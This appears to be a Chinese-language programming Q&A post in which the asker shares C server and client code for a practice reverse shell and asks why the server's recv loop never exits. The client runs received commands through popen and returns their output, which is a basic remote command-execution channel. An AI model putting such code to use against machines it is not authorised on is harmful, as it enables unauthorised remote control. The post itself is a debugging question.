【发布时间】:2020-07-25 05:26:06
【问题描述】:
我正在开发一个反向 shell(用于练习),我正在尝试将 popen 函数的输出发送回服务器。出于某种原因,当我遍历文件并发送它时,(server recv)循环在停止接收消息时不会中断。谁能找到我的错误。并帮我修复它? 服务器代码:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/types.h>
#define PORT 4583
int main(){
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in server;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(PORT);
server.sin_family = AF_INET;
bind(sock, (struct sockaddr *) &server, sizeof(server));
listen(sock, 2);
int client = accept(sock, NULL, NULL);
char * command = (char *) malloc(75);
char * output = (char * ) malloc (5000);
ssize_t size;
while (1){
printf(">> ");
fgets(command, 75, stdin);
send(client, command, strlen(command), 0);
while((size = recv(client, output, 5000, 0)) != 0){
printf("%s", output);
if (size == 0){
break;
}
}
printf("Done");
}
free(command);
free(output);
return 0;
}
客户端代码:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define PORT 4583
int main(){
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in server;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(PORT);
server.sin_family = AF_INET;
connect(sock, (struct sockaddr *) &server, sizeof(server));
char* command = (char *) malloc(75);
int commandlen;
char* output = (char *) malloc (5000);
while (1){
recv(sock, command, 75, 0);
commandlen = strlen(command);
if (*command == 'c' && *command+1 == 'd'){
command[commandlen-1] = '\0';
int stat = chdir(command+3);
if (stat != 0){
output = strerror(errno);
send(sock, output, 5000, 0);
} else {
send(sock, 0, 0, 0);
}
} else{
FILE * cmd = popen(command, "r");
while (fgets(output, 5000, cmd) != NULL){
send(sock, output, 5000, 0);
}
pclose(cmd);
}
}
free(output);
free(command);
return 0;
}
【问题讨论】:
-
检查
recv()返回的值是必要的,而不仅仅是进行错误检查。
标签: c sockets tcp recv reverse-shell